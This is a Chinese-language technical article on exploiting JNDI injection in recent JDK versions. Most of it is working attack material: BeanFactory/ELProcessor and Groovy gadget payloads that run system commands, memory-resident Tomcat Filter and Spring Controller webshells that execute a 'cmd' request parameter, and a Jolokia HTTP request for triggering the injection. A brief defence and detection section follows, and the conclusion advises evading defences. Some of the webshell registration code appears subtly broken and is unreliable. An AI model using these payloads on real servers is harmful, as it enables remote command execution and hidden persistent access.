JDK高版本下的JNDI利用及内存马注入技术研究<\/h1>

一、背景与问题概述<\/h2>

在Java安全领域，JNDI注入攻击在JDK高版本(8u191+)中受到限制，传统的远程类加载方式失效。本文针对以下场景：<\/p>

通过Jolokia接口发现的JNDI注入点<\/li>
需要绕过JDK高版本限制<\/li>

实现稳定的内存马注入<\/li> <\/ul>

二、JDK版本限制分析<\/h2>

1. JDK防御机制演进<\/h3>

8u121\/8u131<\/strong>：限制RMI远程代码加载<\/li>
8u191<\/strong>：默认禁用LDAP远程代码加载<\/li>

11.0.1<\/strong>：进一步强化限制<\/li> <\/ul>
2. 关键限制点<\/h3>

com.sun.jndi.ldap.object.trustURLCodebase<\/code>默认为false<\/li>
禁止从远程LDAP服务器加载任意Java类<\/li> <\/ul> 三、绕过技术研究<\/h2> 1. 利用本地ClassPath中的类<\/h3> 寻找存在危险方法的本地类<\/li> 常用类包括： org.apache.naming.factory.BeanFactory<\/code><\/li> javax.el.ELProcessor<\/code><\/li> groovy.lang.GroovyClassLoader<\/code><\/li> <\/ul> <\/li> <\/ul> 2. ELProcessor利用链<\/h3> \/\/ 利用EL表达式执行命令 <\/span><\/span><\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','\/c','calc']).start()\")"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>3. GroovyClassLoader利用链<\/h3> ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"groovy.lang.GroovyClassLoader"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=parseClass"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "String cmd = \"calc\";@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(cmd)})class X{}"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>四、内存马注入技术<\/h2> 1. Tomcat Filter内存马<\/h3> \/\/ 通过JNDI注入注册Filter <\/span><\/span><\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> <\/span><\/span> "var cls = ''.getClass().forName('org.apache.catalina.core.ApplicationFilterConfig');"<\/span> +<\/span> <\/span><\/span> "var field = cls.getDeclaredField('filterDef');"<\/span> +<\/span> <\/span><\/span> "field.setAccessible(true);"<\/span> +<\/span> <\/span><\/span> "var filterDef = ''.getClass().forName('org.apache.tomcat.util.descriptor.web.FilterDef');"<\/span> +<\/span> <\/span><\/span> "var filter = new javax.servlet.Filter() { "<\/span> +<\/span> <\/span><\/span> " public void doFilter(javax.servlet.ServletRequest req, javax.servlet.ServletResponse res, javax.servlet.FilterChain chain) { "<\/span> +<\/span> <\/span><\/span> " try { "<\/span> +<\/span> <\/span><\/span> " if (req.getParameter('cmd') != null) { "<\/span> +<\/span> <\/span><\/span> " java.io.Writer writer = res.getWriter(); "<\/span> +<\/span> <\/span><\/span> " writer.write('<pre>'); "<\/span> +<\/span> <\/span><\/span> " writer.write(new java.util.Scanner(Runtime.getRuntime().exec(req.getParameter('cmd')).getInputStream()).useDelimiter('\\\\A').next()); "<\/span> +<\/span> <\/span><\/span> " writer.write('<\/pre>'); "<\/span> +<\/span> <\/span><\/span> " writer.flush(); "<\/span> +<\/span> <\/span><\/span> " return; "<\/span> +<\/span> <\/span><\/span> " } "<\/span> +<\/span> <\/span><\/span> " } catch (Exception e) {} "<\/span> +<\/span> <\/span><\/span> " chain.doFilter(req, res); "<\/span> +<\/span> <\/span><\/span> " } "<\/span> +<\/span> <\/span><\/span> "}; "<\/span> +<\/span> <\/span><\/span> "var def = filterDef.newInstance(); "<\/span> +<\/span> <\/span><\/span> "def.setFilter(filter); "<\/span> +<\/span> <\/span><\/span> "def.setFilterName('evilFilter'); "<\/span> +<\/span> <\/span><\/span> "def.addURLPattern('\/*'); "<\/span> +<\/span> <\/span><\/span> "var configs = ''.getClass().forName('org.apache.catalina.core.ApplicationContext')"<\/span> +<\/span> <\/span><\/span> " .getMethod('getServletContext').invoke(null)"<\/span> +<\/span> <\/span><\/span> " .getClass().getMethod('getFilterRegistrations').invoke(null); "<\/span> +<\/span> <\/span><\/span> "configs.put('evilFilter', def);"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>2. Spring Controller内存马<\/h3> \/\/ 通过JNDI注入注册Spring Controller <\/span><\/span><\/span><\/span>ResourceRef ref =<\/span> new<\/span> ResourceRef(<\/span>"javax.el.ELProcessor"<\/span>,<\/span> null<\/span>,<\/span> ""<\/span>,<\/span> ""<\/span>,<\/span> true<\/span>,<\/span>"org.apache.naming.factory.BeanFactory"<\/span>,<\/span>null<\/span>);<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span> <\/span><\/span>ref.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> <\/span><\/span> "var ctx = ''.getClass().forName('org.springframework.web.context.request.RequestContextHolder').getMethod('currentRequestAttributes').invoke(null);"<\/span> +<\/span> <\/span><\/span> "var req = ctx.getClass().getMethod('getRequest').invoke(ctx);"<\/span> +<\/span> <\/span><\/span> "var res = ctx.getClass().getMethod('getResponse').invoke(ctx);"<\/span> +<\/span> <\/span><\/span> "if (req.getParameter('cmd') != null) {"<\/span> +<\/span> <\/span><\/span> " java.io.Writer writer = res.getWriter();"<\/span> +<\/span> <\/span><\/span> " writer.write('<pre>');"<\/span> +<\/span> <\/span><\/span> " writer.write(new java.util.Scanner(Runtime.getRuntime().exec(req.getParameter('cmd')).getInputStream()).useDelimiter('\\\\A').next());"<\/span> +<\/span> <\/span><\/span> " writer.write('<\/pre>');"<\/span> +<\/span> <\/span><\/span> " writer.flush();"<\/span> +<\/span> <\/span><\/span> "}"<\/span>));<\/span> <\/span><\/span><\/code><\/pre>五、Jolokia接口利用<\/h2> 1. Jolokia JNDI注入点识别<\/h3> 查找\/jolokia<\/code>或\/actuator\/jolokia<\/code>端点<\/li> 检查createJNDIRealm<\/code>等危险操作<\/li> <\/ul> 2. 利用方式<\/h3> POST<\/span> \/jolokia\/ HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> target.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/json<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "type"<\/span>: "EXEC"<\/span>, <\/span><\/span> "mbean"<\/span>: "Tomcat:type=MBeanFactory"<\/span>, <\/span><\/span> "operation"<\/span>: "createJNDIRealm"<\/span>, <\/span><\/span> "arguments"<\/span>: ["java:comp\/env\/evil"<\/span>] <\/span><\/span>} <\/span><\/span><\/code><\/pre>六、防御与检测<\/h2> 1. 防御措施<\/h3> 升级JDK至最新版本<\/li> 设置com.sun.jndi.ldap.object.trustURLCodebase=false<\/code><\/li> 限制JNDI查找源<\/li> 关闭不必要的JMX\/Jolokia接口<\/li> <\/ul> 2. 内存马检测<\/h3> 检查异常Filter\/Controller<\/li> 监控动态类加载<\/li> 使用RASP进行防护<\/li> <\/ul> 七、总结<\/h2> 本文详细分析了高版本JDK下的JNDI利用技术，重点介绍了通过本地类绕过限制的方法和内存马注入的实现。在实际渗透测试中，需要根据目标环境选择合适的利用链，并注意规避防御措施。<\/p>